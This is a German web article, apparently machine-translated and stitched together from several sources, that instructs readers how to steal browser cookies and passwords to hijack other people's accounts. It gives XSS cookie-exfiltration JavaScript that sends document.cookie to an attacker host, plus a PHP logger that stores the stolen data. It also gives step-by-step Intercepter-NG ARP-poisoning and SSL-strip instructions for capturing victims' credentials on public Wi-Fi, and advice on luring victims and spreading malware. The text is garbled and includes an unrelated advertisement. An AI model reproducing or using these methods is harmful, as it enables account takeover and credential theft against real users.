Eine einfache Möglichkeit, einen Keks zu stehlen. Methoden zum Stehlen von Cookies Laden Sie ein Programm zum Stehlen von Cookies herunter

Ist Ihnen aufgefallen, dass die Website Sie erkennt und mit den Einstellungen öffnet, die Sie beim letzten Mal vorgenommen haben, wenn Sie zu einer Website zurückkehren, die Sie bereits besucht haben? Ja, und zwar ziemlich oft? Dies ist auf Cookies zurückzuführen, die Informationen über Besucher wie Login, Passwort, Sitzungs-ID und andere Variablen speichern, die zur Identifizierung des Besuchers und zur Anzeige des Seiteninhalts gemäß den Präferenzen des Benutzers erforderlich sind, die dieser bei seinem letzten Besuch der Ressource ausgewählt hat. Das WebCookiesSniffer-Programm zeigt dem Benutzer die Cookies und deren Inhalte der Websites an, die vom Benutzer im Browser angezeigt werden.

Cookies anzeigen

Sie öffnen die Website und WebCookiesSniffer erfasst Kekse s in Echtzeit. Das Dienstprogramm fügt alle abgefangenen Cookies einer Tabelle hinzu, die Daten über den Host, den Anforderungspfad, die Gesamtlänge der Cookie-Datei, die Anzahl der Variablen in der Cookie-Datei und die Cookie-Zeile selbst mit den Namen der Variablen und Werte speichert. Die gesammelten Informationen über Cookies können von WebCookiesSniffer gespeichert werden Textdatei. Das Programm bietet außerdem die Möglichkeit, einen HTML-Bericht über alle oder ausgewählte Cookies zu erstellen. Damit das Programm funktioniert, müssen Sie den WinPcap-Treiber installieren (er befindet sich zusammen mit WebCookiesSniffer im Archiv). Um die Sprache des WebCookiesSniffer-Programms auf Russisch zu ändern, kopieren Sie die Datei WebCookiesSniffer_lng.ini (ebenfalls im Archiv enthalten) in das Verzeichnis mit dem Dienstprogramm.

Screenshots von WebCookiesSniffer



Möglichkeiten, Kekse zu stehlen

Cookie-Hacking funktioniert hervorragend und wird von vielen Hackern verwendet. Wenn Sie es auch ausprobieren möchten, aber nicht wissen, was Sie tun sollen, lesen Sie unsere Empfehlungen.

Was sind Cookies?

Hierbei handelt es sich um Informationen über den Besuch eines Benutzers auf einer bestimmten Website. Es wird in einem separaten Textdokument gespeichert. Dort finden Sie vielfältige Informationen. Einschließlich Logins, Passwörter, Adressen Postfächer und Telefonnummern. Deshalb versuchen Einbrecher, an diese Dokumente zu gelangen. Um die richtigen Materialien zu stehlen, greifen Hacker auf verschiedene Methoden zurück.

Möglichkeiten, Kekse zu stehlen

XSS-Sicherheitslücke

Es kann auf jeder Website gefunden und verwendet werden. Wenn ein Spezialist eine Schwachstelle findet, injiziert er diese Sondercode. Je nach Verwendungszweck sind die Codes unterschiedlich, sie werden für eine bestimmte Ressource geschrieben. Wenn der Benutzer diese Seite besucht und aktualisiert, werden alle Änderungen übernommen. Der Code beginnt zu wirken – er wird in den Computer des Opfers eingeführt und sammelt alles notwendige Informationen vom Browser.

Um Code einzugeben, können Sie jede Art von Schwachstelle nutzen – einen Fehler in einer Webressource, in einem Browser oder Computersystem.

Es gibt zwei Arten von XSS-Angriffen:

Passiv - an das Seitenskript weitergeleitet. In diesem Fall müssen Sie nach Schwachstellen in den Seitenelementen suchen. Zum Beispiel eine Registerkarte mit Dialogen, ein Suchfeld, ein Videokatalog usw.

Aktiv - Sie sollten auf dem Server gesucht werden. Besonders häufig sind sie in verschiedenen Foren, Blogs und Chats vertreten.

Wie kann man eine Person dazu zwingen, XSS anzuwenden?

Die Aufgabe ist nicht einfach, denn oft muss man auf den dazugehörigen Link klicken, um den Code zu aktivieren. Sie können den Link verschleiern und ihn zusammen mit einem interessanten Angebot in einem Brief versenden. Bieten Sie beispielsweise einen großen Rabatt in einem Online-Shop an. Sie können das alles auch in das Bild einbetten. Es ist sehr wahrscheinlich, dass der Benutzer es sieht und nichts vermutet.

Installation eines Sniffers

Diese Implementierung Spezialprogramme zum Verfolgen des Datenverkehrs auf dem Gerät einer anderen Person. Mit dem Sniffer können Sie übertragene Sitzungen mit den Daten anderer Personen abfangen. So können Sie alle Logins und Passwörter, Adressen usw. abrufen wichtige Informationen vom Benutzer über das Netzwerk übertragen werden. Gleichzeitig werden Angriffe am häufigsten auf ungeschützte HTTP-Daten ausgeführt. Ungesichertes WLAN eignet sich hierfür gut.

Es gibt mehrere Möglichkeiten, einen Sniffer zu implementieren:

  • Datenverkehr kopieren;
  • Datenanalyse mittels Traffic-Attacken;
  • Abhören von Schnittstellen;
  • Implementierung eines Sniffers in eine Kanalunterbrechung.
Cookie-Ersatz

Alle Daten werden in ihrer ursprünglichen Form auf dem Webserver gespeichert. Wenn Sie sie ändern, gilt dies als Ersatz. Alle erhaltenen Materialien können auf einem anderen Computer verwendet werden. So erhalten Sie voller Zugriff auf die personenbezogenen Daten des Nutzers. Cookies können über Browsereinstellungen, Add-ons oder spezielle Programme geändert werden. Die Bearbeitung ist auch in jedem Standard-Notizblock am PC möglich.

Cookies mit einem Virus stehlen

Experten raten davon ab, Cookies zu verwenden, es sei denn, es besteht ein besonderer Bedarf. Wenn es möglich ist, sie zu deaktivieren, ist es am besten, dies zu tun. Dies liegt daran, dass Cookies sehr anfällig sind. Sie werden oft von Dieben gestohlen. Aus diesen Dateien können Sie eine große Menge persönlicher Informationen erhalten. vertrauliche Informationen gegen eine Person verwendet werden. Die gefährlichste Art von Dateien sind diejenigen, die nach Beendigung der Sitzung im System verbleiben.

Cookies werden häufig mithilfe eines Virenprogramms gestohlen. Das geht ganz einfach. In jedes sichere Dienstprogramm ist ein Virus eingebettet, der bestimmte Materialien auf dem Computer sammelt. Virenprogramm wird mit dem Server seines Besitzers verbunden. Das Programm muss so konfiguriert sein, dass der Browser es als Proxyserver verwendet.

Wenn das Programm auf den PC des Opfers gelangt, beginnt es automatisch mit der Erfassung aller gespeicherten Daten und sendet diese an Sie.

Viren sind unterschiedlich, ihre Funktionen können sich auch unterscheiden. Bei einigen können Sie den Browser vollständig steuern und alle Informationen anzeigen. Andere sind in der Lage, geschützte Materialien zu stehlen. Wieder andere sammeln nur ungesicherte Daten.

Möglicherweise haben Sie Schwierigkeiten, ein Virenprogramm auf den Computer einer anderen Person einzuschleusen. Sie müssen den Benutzer zwingen, es herunterzuladen und auszuführen. Hier können Sie ihm entweder einen Brief mit einem Link zum Programm schicken oder das Programm als sicher ausgeben und darauf warten, dass die Person es von Ihrer Website herunterlädt.

Wie schützt man Cookies vor Diebstahl?

Die meisten Webressourcen sind nicht sicher genug. Hacker finden auf diesen Plattformen leicht Schwachstellen und Fehler.

Cookie-Schutzregeln:

  1. Binden Sie die Computer-ID an die aktuelle Sitzung. Wenn Sie dann die Website von einem Drittanbietergerät aus betreten, wird eine neue Sitzung gestartet und die Daten der vorherigen Sitzung können nicht abgerufen werden.
  2. Binden Sie die Sitzung an den Browser. Es funktioniert das gleiche Prinzip wie im vorherigen Absatz.
  3. Verschlüsseln Sie die über das Netzwerk übertragenen Parameter. Dann können die im Dokument gespeicherten Informationen nicht verstanden werden. Es wird für denjenigen nutzlos sein, der es abgefangen hat. Diese Technik schützt Sie nicht zu 100 %, einige Experten können jedes Material entschlüsseln.
  4. Erstellen Sie einen separaten Ordner für Indizes.

Wie kann ich mithilfe von Cookies das Passwort eines fremden Kontos herausfinden?

Um die Daten einer anderen Person zur Autorisierung zu erhalten, müssen Sie zunächst zu der Datei gelangen, in der sie gespeichert wurden.

Für diejenigen, die es verwenden Mozilla Firefox Sie müssen zur Registerkarte „Extras“ gehen, die sich im Hauptmenü befindet. Weiter in den Systemeinstellungen finden Sie den Bereich „Schutz“, in dem Sie alle wichtigen Informationen zu Konten in sozialen Netzwerken suchen sollten. Alle Passwörter sind ausgeblendet, klicken Sie also auf die Schaltfläche „Anzeigen“. Hier können Sie einen Schutz installieren und einen speziellen Code eingeben. Dann wird niemand außer Ihnen diese Informationen erhalten.

In Opera stehen nur Benutzernamen zur allgemeinen Anzeige zur Verfügung. Aber im Menü finden Sie den Passwort-Manager und können alle auf dem Computer gespeicherten Daten einsehen. Volle Liste steht im Manager. Um Zugriff auf Passwörter zu erhalten, müssen Sie eine zusätzliche Erweiterung installieren.

IN Google Chrome Alle diese Materialien können in den erweiterten Einstellungen angezeigt werden. Es gibt eine Registerkarte mit allen gespeicherten Cookies.

Leider der Standardbrowser Internet Explorer verfügt nicht über diese Funktionen. Um Informationen über die vom PC-Besitzer besuchten Webplattformen zu erhalten, müssen Sie ein spezielles Programm herunterladen. Es kann kostenlos im Internet gefunden werden, es ist absolut sicher, aber es ist besser, es von vertrauenswürdigen Quellen herunterzuladen. Vergessen Sie nicht, dass jedes Programm von einem Antivirenprogramm überprüft werden sollte. Dies gilt insbesondere für Dienstprogramme, die mit Passwörtern arbeiten.

Diese Technik eignet sich nur für Personen, die physischen Zugriff auf den Computer des Opfers haben. Sie können auch das Passwort einer anderen Person herausfinden, wenn sich die Person über Ihren PC auf der Plattform angemeldet und ihre Daten gespeichert hat.

Programme zum Stehlen von Cookies

Es gibt viele Hacker-Foren im Internet, in denen Hacker miteinander kommunizieren. Die Leute gehen dorthin in der Hoffnung, etwas zu bekommen kostenlose Hilfe. Dort finden Sie eine Vielzahl verschiedener Hacking-Programme. Wir möchten Sie warnen, dass Sie diesen Programmen nicht vertrauen sollten. Dienstprogramme zum Remote-Stehlen von Cookies vom Gerät einer anderen Person sind Dummies oder Virenprogramme. Wenn Sie diese Software auf Ihren PC herunterladen, geraten Sie höchstwahrscheinlich selbst in die Falle eines Betrügers. Free-Place-Programme für Gauner. Dadurch verbreiten sie Virensoftware und erlangen die Kontrolle über fremde PCs. Im Allgemeinen handelt es sich bei solchen Programmen um Betrug, das erkennen Sie an der Benutzeroberfläche und dem Inhalt. Wenn Sie eine Software zum Extrahieren von Dateien verwenden, sollten Sie es mit Sniffer-Programmen tun. Natürlich sind sie nicht einfach zu bedienen. Und es ist nicht einfach, im Internet einen guten Schnüffler zu finden. Aber solche Software gibt es bei Spezialisten, die sie Ihnen für Geld verkaufen können. Denken Sie daran, dass es viele Betrüger gibt und jeder seine eigenen Tricks hat. Sie sollten nur bewährten Hackern vertrauen, die einen guten Ruf haben, über Bewertungen verfügen und über eine eigene Website verfügen.

Abschließend möchte ich anmerken, dass das Stehlen von Cookies eine wirklich wirkungsvolle Methode ist, deren Wirksamkeit sehr hoch ist. Wenn Sie das Profil einer Person in einem sozialen Netzwerk oder Messenger hacken möchten, sollten Sie diese Option unbedingt in Betracht ziehen. Diese Methode funktioniert am besten, wenn Sie den Computer des Opfers verwenden können. Es ist viel schwieriger, Materialien aus der Ferne zu besorgen, aber Sie können unseren Rat befolgen und versuchen, diese Methode in die Praxis umzusetzen.

Im Kapitel

Was ist ein Cookie?

Es gibt einen Mechanismus, der es dem HTTP-Server ermöglicht, einige davon auf dem Computer des Benutzers zu speichern Textinformationen und dann kontaktiere sie. Diese Information wird als Cookie bezeichnet. Tatsächlich ist jedes Cookie ein Paar: der Name des Parameters und sein Wert. Jedem Cookie wird außerdem die Domain zugeordnet, zu der es gehört. Aus Sicherheitsgründen darf der http-Server in allen Browsern nur auf sein eigenes Domain-Cookie zugreifen. Darüber hinaus können Cookies ein Ablaufdatum haben. In diesem Fall bleiben sie bis zu diesem Datum auf dem Computer gespeichert, auch wenn alle Browserfenster geschlossen sind.


Warum sind Cookies wichtig?

In allen Mehrbenutzersystemen werden Cookies zur Identifizierung des Benutzers verwendet. Oder besser gesagt, die aktuelle Verbindung des Benutzers mit dem Dienst, die Benutzersitzung. Wenn jemand Ihre Cookies erkennt, kann er sich in Ihrem Namen anmelden. Denn derzeit überprüfen nur sehr wenige Internetressourcen die Änderung der IP-Adresse während einer Benutzersitzung.


Wie kann ich Cookies ändern oder ändern?

Browserentwickler stellen keine integrierten Tools zum Bearbeiten von Cookies zur Verfügung. Sie können aber auch mit einem normalen Notizblock (Notizblock) auskommen.


Schritt 1: Erstellen Sie eine Textdatei mit Text

Windows-Registrierungseditor Version 5.00



@="C:\\IE_ext.htm"

Wir speichern es unter dem Namen IE_ext.reg

Schritt 2: Fügen Sie mithilfe der erstellten Datei Änderungen zur Windows-Registrierung hinzu.

Schritt 3: Erstellen Sie eine Textdatei mit Text

< script language="javascript">
external.menuArguments.clipboardData.setData("Text" , external.menuArguments.document.cookie);

external.menuArguments.document.cookie= „testname=testvalue; path=/; domain=testdomain.ru“;
Alert(external.menuArguments.document.cookie);


Speichern Sie es unter C:\IE_ext.htm

Schritt 4: Wir gehen auf die für uns interessante Website.

Schritt 5: Klicken Sie mit der rechten Maustaste auf eine leere Stelle auf der Seite und wählen Sie den Menüpunkt aus „Arbeiten mit Cookies“. Erlauben Sie den Zugriff auf die Zwischenablage. Ihre Cookies für diese Website werden in der Zwischenablage abgelegt. Sie können ihren Notizblock (Notizblock) einfügen und sehen.


Schritt 6: Um einige Cookies zu ändern, bearbeiten Sie die Datei C:\IE_ext.htm und ersetzen Sie sie Testname im Namen des Cookies, Testwert- über seine Bedeutung, testdomain.ru- zur Website-Domain. Fügen Sie bei Bedarf weitere Zeilen wie diese hinzu. Zur Vereinfachung der Kontrolle habe ich dem Skript vor und nach der Änderung die Ausgabe der aktuellen Cookies hinzugefügt: Alert(external.menuArguments.document.cookie);

Schritt 7: Führen Sie Schritt 5 erneut aus und aktualisieren Sie dann die Seite.

Fazit: Wir werden diese Internetressource mit aktualisierten Cookies aufrufen.

Wie stiehlt man Cookies mit JavaScript?

Gelingt es einem Angreifer, ein beliebiges JavaScript-Skript auf dem Computer des Opfers auszuführen, kann er die aktuellen Cookies sehr einfach auslesen. Beispiel:


varstr=document.cookie;

Aber wird er sie auf seine Website übertragen können, da, wie ich bereits erwähnt habe, ein JavaScript-Skript ohne zusätzliche Bestätigung nicht auf eine Website zugreifen kann, die sich in einer anderen Domain befindet? Es stellt sich heraus, dass ein JavaScript-Skript jedes Bild laden kann, das sich auf einem beliebigen http-Server befindet. Übertragen Sie gleichzeitig alle Textinformationen der Download-Anfrage auf dieses Bild. Beispiel: http://hackersite.ru/xss.jpg?text_info Wenn Sie also diesen Code ausführen:

varimg= neues Bild();

img.src= „http://hackersite.ru/xss.jpg?“+ encodeURI(document.cookie);


Dann befinden sich die Cookies in der Aufforderung, das „Bild“ herunterzuladen und dem Angreifer zu „überlassen“.

Wie gehe ich mit solchen Anfragen um, ein „Bild“ hochzuladen?

Ein Angreifer muss lediglich ein Hosting mit PHP-Unterstützung finden und Code wie diesen einfügen:

$uid=urldecode($_SERVER["QUERY_STRING"]);
$fp=fopen("log.txt","a");
fputs($fp,"$uid\n");
fclose($fp);
?>

Dann werden alle Abfrageparameter zu diesem Skript in der Datei gespeichert log.txt. Es bleibt nur noch das zuvor beschriebene JavaScript-Skript zu ersetzen http://hackersite.ru/xss.jpg zum Pfad zu diesem PHP-Skript.


Ergebnis

Ich habe nur den einfachsten Weg gezeigt, XSS-Schwachstellen auszunutzen. Aber es beweist, dass das Vorhandensein mindestens einer solchen Schwachstelle auf einer Mehrbenutzer-Internetseite es einem Angreifer ermöglichen kann, ihre Ressourcen in Ihrem Namen zu nutzen.

Hallo, eher dieser kurze Artikel Kurzbeschreibung Ich möchte mich widmen einfacher Weg Abfangen von Cookies in WLAN-Netzwerke. Was sind Cookies und warum werden sie benötigt? In einem drahtlosen Netzwerk sollte er meiner Meinung nach wissen, was es ist und warum er es braucht. Lassen Sie mich nur eines sagen: Mit Hilfe dieser Dateien können Sie auf die Konten anderer Personen auf verschiedenen Websites zugreifen, bei denen Benutzer den Authentifizierungsprozess durchlaufen müssen (z. B. mail.ru, vkontakte.ru usw.).

Also lasst uns anfangen. Zuerst müssen wir uns selbst finden drahtloses Netzwerk, mit einem offenen Internet-Zugangs-Gateway, und es ist wünschenswert, dass dieses Netzwerk viele Clients hat. Zum Beispiel jedes Netzwerk im Großen Einkaufszentren, Flughäfen, verschiedene Kaffeehäuser, an solchen Orten nutzen die Leute normalerweise WLAN-Zugang im Internet, zum Lesen von E-Mails, zum Überprüfen von Konten auf verschiedenen Dating-Sites, zum Anzeigen von LJ und allen Arten von Foren. Das ist alles, genau das, was wir brauchen. Nachdem wir uns für die Wahl des Standorts des Netzwerks entschieden und bestimmte Stunden der maximalen Anzahl von Kunden untersucht haben, werden wir direkt mit den Kämpfen fortfahren. Dazu benötigen wir einen Laptop mit WLAN-Adapter, und eine bestimmte Reihe von Programmen. In meinem Fall habe ich verwendet Acer-Laptop Aspire 3610, D-Link DWL G650 Wi-Fi-Client-Karte und installiertes BackTrack3-Betriebssystem.

Ich empfehle Ihnen, dieses Betriebssystem zu verwenden, da es bereits alle Programme enthält, die Sie benötigen, und der wichtigste Vorteil ist, dass Sie Backtrack nicht auf Ihrem installieren müssen Festplatte, können Sie dieses Betriebssystem direkt von einer CD oder einem Flash-Laufwerk starten.

Kommen wir nun zur benötigten Software. Ich habe Kismet verwendet, um Netzwerke zu entdecken, und WifiZoo, um Cookies abzufangen. Auf das zweite Programm werde ich im Detail eingehen. WifiZoo ist ein passiver Luftscanner und sammelt ziemlich viel nützliche Informationen, wie zum Beispiel: POP3, SMTP-Verkehr, http-Cookies/Authinfo, MSN, FTP-Anmeldeinformationen, Telnet-Netzwerkverkehr, NBT usw. Der einzige Nachteil dieses Programms ist das Fehlen eines Kanalsprungmodus. WifiZoo hört einfach auf die drahtlose Schnittstelle und kann sozusagen nicht von Kanal zu Kanal springen. Dieser Nachteil wird jedoch durch ein anderes Programm, Kismet, ausgeglichen, das diesen Modus unterstützt. Um WifiZoo auszuführen, benötigen Sie:

  • Python
  • unheimlich
  • Kismet

Also starten wir das Programm, zuerst starten wir Kismet, um den Channel-Hopping-Modus zu unterstützen, dann starten wir WifiZoo direkt, Sie sollten das folgende Fenster sehen:

Jetzt müssen Sie nur noch warten, bis Sie etwas abfangen. Alles, was das Programm abfängt, finden Sie in den Protokollen, die sich im Verzeichnis /logs/ des Programms befinden. Sie können auch eine GUI-Schnittstelle ausführen, die bei 127.0.0.1:8000 automatisch auf http umsteigt

Ich werde nicht über alle Funktionen dieses wunderbaren Programms schreiben, ich denke, Sie werden den Rest der Möglichkeiten selbst herausfinden, und seitdem dieser Moment Wir sind nur an Cookies interessiert. Wir klicken auf den Link mit der Aufschrift „Cookies“ und sehen, was wir abgefangen haben:

Darüber, wie gefährlich offene WLAN-Zugangspunkte sind, darüber, was Passwörter abfangen können.

Heute betrachten wir das Abfangen von Passwörtern über WLAN und das Abfangen von Cookies über WLAN mithilfe des Programms.

Der Angriff wird stattfinden schnüffeln.

schnüffeln- schnüffeln bedeutet übersetzt „schnüffeln“. Durch Schnüffeln können Sie analysieren Netzwerkaktivität im Netzwerk, sehen Sie, welche Websites der Benutzer besucht, und fangen Sie Passwörter ab. Es kann aber auch für nützliche Zwecke verwendet werden, um Viren abzuhören, die beliebige Daten ins Internet senden.


Die Methode, die ich zeigen werde, ist ziemlich primitiv und einfach. Tatsächlich können Sie das Programm stärker nutzen.
Die offizielle Website des Programms sniff.su (kopieren Sie den Link und öffnen Sie ihn in einem neuen Tab), Sie können ihn im Abschnitt herunterladen Herunterladen.
Es gibt eine Version für Windows Unix-Systeme und für Android.
Wir werden Windows in Betracht ziehen, da dies das beliebteste System und das Programm hier das fortschrittlichste ist.
Ihr Browser oder Ihr Antivirenprogramm schwört möglicherweise, dass das Programm gefährlich ist, aber Sie wissen selbst, dass es sich um ein Hackprogramm handelt, und es wird immer darauf reagieren.
Das Programm wird in einem Zip-Archiv heruntergeladen, das Programm muss lediglich in einen Ordner entpackt werden und es ist keine Installation erforderlich.
Das Programm ist in der Lage, verschiedene Mitm-Angriffe auf Wi-Fi-Netzwerke zu arrangieren.
Der Artikel dient ausschließlich Informationszwecken, um ein Beispiel für die Gefahren von Open zu zeigen Hotspots beliebig spezifizierte Aktionen, Sie treten auf eigenes Risiko auf. Und ich möchte Sie an die strafrechtliche Verantwortlichkeit erinnern, die den Schutz der Daten anderer Personen mit sich bringt.

Service avi1 bietet atemberaubend günstige Preise für die Möglichkeit, Follower für Ihr Instagram-Profil zu bestellen. Erzielen Sie jetzt eine Steigerung der Popularität im Netzwerk oder im Vertrieb, ohne großen Aufwand und Zeitaufwand.

Arbeiten mit Intercepter NG

Das Programm wird also über Intercepter-NG.exe gestartet.
Das Programm hat eine englische Benutzeroberfläche, aber wenn Sie ein sicherer Computerbenutzer sind, werden Sie es meiner Meinung nach verstehen.

Unten finden Sie ein Video zum Einrichten (für diejenigen, die lieber zuschauen als lesen möchten).
- wählen gewünschtes Netzwerk oben, wenn Sie mehr als eine haben.
- Schaltertyp Ethernet/WLAN Wenn Sie über WLAN verfügen, müssen Sie das WLAN-Symbol (links neben der Netzwerkauswahl) auswählen.

- Drücken Sie den Knopf Scan-Modus(Radarsymbol)
- Klicken Sie mit der rechten Maustaste in ein leeres Feld und klicken Sie hinein Kontextmenü intelligente Suche
- Alle mit dem Netzwerk verbundenen Geräte werden angezeigt
- Wählen Sie ein Opfer aus (Sie können jeden auswählen, indem Sie die Umschalttaste gedrückt halten), markieren Sie jedoch nicht den Router selbst, seine IP ist normalerweise 192.168.1.1
- Klicken Sie mit der rechten Maustaste auf die Auswahl und klicken Sie Zu Nat hinzufügen


- Gehen Sie zur Registerkarte Nat
- IN Stealth-IP Es ist ratsam, die letzte Ziffer durch eine beliebige zu ersetzen, da dadurch Ihre tatsächliche IP-Adresse verborgen bleibt.
- Häkchen setzen SSL-Streifen Und SSL-Mitm.


- Drücken Sie Einstellungen(Zahnräder rechts).
- Setzen Sie ein Häkchen Auferstehung(Dadurch können Sie Passwörter und Cookies des verschlüsselten HTTPS-Protokolls abfangen) und entfernen IP/Mac fälschen. Sie können das ankreuzen Kekskiller Dank ihr wird das Opfer beispielsweise von der aktuellen Seite ausgeschlossen Soziales Netzwerk und das Opfer muss das Passwort erneut eingeben und wir werden es abfangen. Vergleichen Sie die Einstellungen mit dem Bild.


- Hier ist die Einstellung abgeschlossen, schließen Sie die Einstellungen mit einem Häkchen.
„Die Einrichtung ist abgeschlossen, Sie können den Angriff starten.
- Drücken Sie die Taste oben Mit dem Schnüffeln beginnen/aufhören(Dreieck), klicken Sie im selben Fenster auf das Strahlungssymbol unten ARP-Gift starten/stoppen
- Gehen Sie zur Registerkarte Passwortmodus und klicken Sie mit der rechten Maustaste in das Fenster und wählen Sie aus Cookies anzeigen(„Hier werden von den Opfern eingegebene Cookies und Passwörter angezeigt“)
Alles, wir warten darauf, dass jemand das Passwort eingibt.
Manchmal kommt es vor, dass das Internet nicht mehr funktioniert. Versuchen Sie, selbst auf das Internet zuzugreifen. Wenn es nicht funktioniert, starten Sie das Programm neu.
Mir ist aufgefallen, dass es nicht immer möglich ist, das Passwort abzufangen, aber tatsächlich funktioniert es fast fehlerfrei.

Das ist alles, wir haben über das Abfangen von Passwörtern über WLAN und das Abfangen von Cookies über WLAN nachgedacht.

Passen Sie auf sich auf